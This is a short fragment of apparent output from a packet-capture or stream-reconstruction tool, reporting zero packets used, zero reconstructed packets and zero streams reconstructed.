Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================